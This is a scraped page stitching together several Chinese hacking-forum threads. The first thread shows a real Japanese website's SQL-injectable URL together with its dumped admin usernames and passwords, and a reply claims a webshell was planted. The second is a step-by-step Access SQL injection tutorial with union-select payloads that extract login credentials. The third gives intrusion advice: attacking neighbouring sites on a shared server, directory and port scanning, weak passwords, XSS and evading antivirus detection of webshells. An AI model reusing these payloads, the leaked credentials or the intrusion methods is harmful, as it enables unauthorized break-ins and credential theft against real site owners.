找个日本站的注入点，帐号密码跑出来了，结果找不到后台，求帮忙_渗透吧_百度贴吧
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&签到排名：今日本吧第个签到，本吧因你更精彩，明天继续来努力！
本吧签到人数：0成为超级会员，使用一键签到本月漏签0次！成为超级会员，赠送8张补签卡连续签到：天&&累计签到：天超级会员单次开通12个月以上，赠送连续签到卡3张
关注：34,196贴子：
找个日本站的注入点，帐号密码跑出来了，结果找不到后台，求帮忙收藏
注入点：http://kamoishikai.or.jp/index.php?id=44Database: admin_kam_407jp_1448_Table: kamo_system_users[2 entries]+------------+------------+| user
| password
|+------------+------------+| kamo
| kamomedi
|| adminU9CB7 | adminVZ6E8 |+------------+------------+求帮忙找后台，找到了求教方法
日本的后台，不好找，爬一下
右键看一下图片的路径 ，可能暴露后台
解决了吗？
马我都上了
你看懂日文？？
登录百度帐号推荐应用
为兴趣而生，贴吧更懂你。或网站找不到注入点怎么办_百度知道查看:7355|回复：9
初级工程师
拿到一网站首先,判断是否存在注入,
id=430',加单引号,判断是什么数据库
and 1=2 返回错误
这3点证明的确存在注入漏洞
现在判断是数据库里的表名
判断有不有admin表
and (select count(*) from admin)&&0
返回正常说明存在_web_login表
现在猜测字段
判断_web_login中是否有username这个字段
and (select username from web_login)&&' '
返回错误说明_web_long表中没有username这个字段
判断_web_login中是否有id这个字段
and (select id from web_login)&&0
返回[Microsoft][ODBC Microsoft Access Driver] 子查询最多能返回一个记录 说明存在而且不只一个,因为用
判断是否有userid这个字段
and (select userid from _web_login where id=1)&&' '
返回正常说明有userid字段
判断是否有passwd这个字段
and (select passwd from _web_login where id=1)&&' '
返回正常说明存在passwd字段
现在表和字段都猜出来了
表:_web_login 字段:id,userid,passwd
现在要猜字段里的内容,有多种方法,用联合查询
先猜了一下,一共有24个字段
先猜第一个语句查询的是22个字段
union (select1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from _web_login)
返回[Microsoft][ODBC Microsoft Access Driver] 在联合查询中所选定的两个数据表或查询中的列数不匹配
说明字段不和
union (select1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from _web_login)
返回正确,并表明要在网站显示的字段内容,是第4和第8,如果把4换成userid,那么4的位置将显示userid的内容
union (select 1,2,3,userid,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from _web_login)
返回4的位置为admin,说明第一个用户是admin,现在我们来暴出密码,把第8换成
passwd,将在第8的位置显示passwd的内容
union (select 1,2,3,userid,5,6,7,passwd,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from _web_login)
值得学习，强烈推荐！
:P 学习了，
不错，值得推荐，好东西！
不要给自己退路,只有在绝路上行走,我们才能走到终点!
没有借口的人生,才是胜利的人生!
助理工程师
非常不错，但就是只有ASP的
高级工程师
感想楼主分享。:victory:
判断有不有admin表
and (select count(*) from admin)&&0
返回正常说明存在_web_login表
很明显 这是有问题的 不知道从那里转过来 也不看看
判断存不存在表不是这样的
and exists(select * from table_name)才对，或者用其它
and (select count(*) from admin)&&0
如果表无记录呢？
select count(*) from admin 返回是0
说明表是存在的
中级工程师
这有什么作用``能解释下吗？
没学过····:(mars_21):
中级工程师
学习中----------
学习点长长经验注入点的判断及猜解_百度文库
两大类热门资源免费畅读
续费一年阅读会员，立省24元！
评价文档：
注入点的判断及猜解
上传于||文档简介
&&注​入​点​的​判​断​及​猜​解
大小：6.14KB
登录百度文库，专享文档复制特权，财富值每天免费拿！
你可能喜欢只需一步，快速开始
后使用快捷导航没有帐号？
查看: 3071|回复: 11
没有注入点的网站怎么入侵？
签到天数: 693 天[LV.9]以坛为家II
有个网站扫到了后台但是没有注入点 该怎么渗透他？有什么其他的入侵方式不？XSS?
sql注入大部分情况下是要拿到后台管理的权限 然后找个上传的地方
之前我遇到过很多也没有sql注入的站 可以考虑 如下方式
首先是旁注 一个服务器除非是超大型的 自己独立一个服务器 否则可以从该ip下的其它网站下手
得到了服务器的权限自然也得到了你想要的该网站(服务器上就是个不同路径的文件夹)的权限
或者采取爆目录 用wwwscan挂个超级字典 就算扫不出数据库的地址 扫出个些明暗目录也是八九不离十
再或者扫端口 看看开了 ...
如果您的【问题求助】得到满意的解答，请自行将分类修改为【已经解决】；如果想鼓励一下楼主或帮助到您的朋友，可以给他们【评分】鼓励；善用【论坛搜索】功能，那里可能有您想要的答案！
签到天数: 363 天[LV.8]以坛为家I
sql注入大部分情况下是要拿到后台管理的权限 然后找个上传的地方
之前我遇到过很多也没有sql注入的站 可以考虑 如下方式
首先是旁注 一个服务器除非是超大型的 自己独立一个服务器 否则可以从该ip下的其它网站下手
得到了服务器的权限自然也得到了你想要的该网站(服务器上就是个不同路径的文件夹)的权限
或者采取爆目录 用wwwscan挂个超级字典 就算扫不出数据库的地址 扫出个些明暗目录也是八九不离十
再或者扫端口 看看开了哪些端口 再冲端口下手
网站入侵后期 免杀是难点
如果您的【问题求助】得到满意的解答，请自行将分类修改为【已经解决】；如果想鼓励一下楼主或帮助到您的朋友，可以给他们【评分】鼓励；善用【论坛搜索】功能，那里可能有您想要的答案！
签到天数: 4 天[LV.2]偶尔看看I
不要停留在网页入侵的层面上嘛，HTML写的静态网站据我所知是不能sql注入的，XSS是可以的。
你可以从目标服务器下手啊，扫面他的服务器，找应用程序漏洞，以及系统服务漏洞嘛，扫描系统漏洞的免费原件有openvas，在linux下的，使用远吗安装就可以了】
如果您的【问题求助】得到满意的解答，请自行将分类修改为【已经解决】；如果想鼓励一下楼主或帮助到您的朋友，可以给他们【评分】鼓励；善用【论坛搜索】功能，那里可能有您想要的答案！
签到天数: 693 天[LV.9]以坛为家II
sql注入大部分情况下是要拿到后台管理的权限 然后找个上传的地方
之前我遇到过很多也没有sql注入的站 可以 ...
如果您的【问题求助】得到满意的解答，请自行将分类修改为【已经解决】；如果想鼓励一下楼主或帮助到您的朋友，可以给他们【评分】鼓励；善用【论坛搜索】功能，那里可能有您想要的答案！
签到天数: 363 天[LV.8]以坛为家I
渗透路漫漫兮拿webshell
webshell不免杀兮一去不复还
webshell我知道 不就是 网站域名么。&
如果您的【问题求助】得到满意的解答，请自行将分类修改为【已经解决】；如果想鼓励一下楼主或帮助到您的朋友，可以给他们【评分】鼓励；善用【论坛搜索】功能，那里可能有您想要的答案！
签到天数: 363 天[LV.8]以坛为家I
渗透路漫漫兮拿webshell
webshell不免杀兮一去不复还
如果您的【问题求助】得到满意的解答，请自行将分类修改为【已经解决】；如果想鼓励一下楼主或帮助到您的朋友，可以给他们【评分】鼓励；善用【论坛搜索】功能，那里可能有您想要的答案！
签到天数: 11 天[LV.3]偶尔看看II
可以换换别的思路，从上传、web容器等方面入手。
如果您的【问题求助】得到满意的解答，请自行将分类修改为【已经解决】；如果想鼓励一下楼主或帮助到您的朋友，可以给他们【评分】鼓励；善用【论坛搜索】功能，那里可能有您想要的答案！
签到天数: 1 天[LV.1]初来乍到
入侵网页不是最终的目的,直接拿到服务器的管理权限,还怕网站拿不下来吗?
网站入侵并不是只有注入点的,看下是什么CMS做的,WWWSCAN扫下数据库地址等等,默认密码,很多很多的.
如果您的【问题求助】得到满意的解答，请自行将分类修改为【已经解决】；如果想鼓励一下楼主或帮助到您的朋友，可以给他们【评分】鼓励；善用【论坛搜索】功能，那里可能有您想要的答案！
签到天数: 5 天[LV.2]偶尔看看I
主站拿不下就看旁站，旁站也拿不下，试试0day
&&或许有弱口令--==
如果您的【问题求助】得到满意的解答，请自行将分类修改为【已经解决】；如果想鼓励一下楼主或帮助到您的朋友，可以给他们【评分】鼓励；善用【论坛搜索】功能，那里可能有您想要的答案！
签到天数: 361 天[LV.8]以坛为家I
楼主可以利用XSS来获取网站权限
如果您的【问题求助】得到满意的解答，请自行将分类修改为【已经解决】；如果想鼓励一下楼主或帮助到您的朋友，可以给他们【评分】鼓励；善用【论坛搜索】功能，那里可能有您想要的答案！
签到天数: 10 天[LV.3]偶尔看看II
如果您的【问题求助】得到满意的解答，请自行将分类修改为【已经解决】；如果想鼓励一下楼主或帮助到您的朋友，可以给他们【评分】鼓励；善用【论坛搜索】功能，那里可能有您想要的答案！
站长推荐 /1
为了促进论坛学习交流、互相分享经验心得，鱼C论坛与15PB信息安全教育共同筹办此次活动。旨在记录大家学习编程的心路历程，分享一些学习经验和技巧……
•••(
Powered by